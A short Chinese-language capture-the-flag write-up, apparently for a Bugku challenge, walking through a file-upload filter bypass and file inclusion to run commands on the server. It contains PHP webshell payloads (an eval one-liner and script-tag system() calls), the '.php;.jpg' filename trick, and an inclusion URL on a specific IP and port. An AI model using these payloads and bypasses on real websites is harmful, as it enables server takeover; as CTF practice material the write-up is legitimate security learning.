首先进去之后是个
页面什么都没有,老套路,先F12后抓包,再扫描。
然而F12就已经出来了我想要的东西(file=这个东西之前的bugku的题也有,要会变通,但是要想到这个东西学过)
藏着某些php页面,那我们进去看看
又是文件上传,额。我没有菜刀喂。。难搞。懂的全部来一遍!!
1.getshell的题目直接抓包的思路抓包
发现修改后缀名为.php以后不成功
2.对文件的后缀也做了限制,%00截断不管用
3.换一种姿势上传一句话,普通一句话会被过滤
普通一句话就会被过滤掉,这里构造<?=eval($_POST[‘shell’]);>
保存文件修改后缀为1.php;.jpg,成功上传
根据提示是文件包含,直接访问文件路径无效,菜刀无法连接
包含文件进行访问时空白页面
菜刀连接也是失败的
4.那就直接构造命令执行
<script language=php>system("ls")</script>
同理,修改后缀名为jpg,如233.php;.jpg,上传成功
5.访问图片包含路径
http://118.89.219.210:49166/index.php?file=upload/201804141202562458.jpg
或者构造命令执行:
<script language=php>system("cat 访问的文件名.txt")</script>
包含文件的方式直接访问.txt文件
若有收获,就点个赞吧
0 人点赞
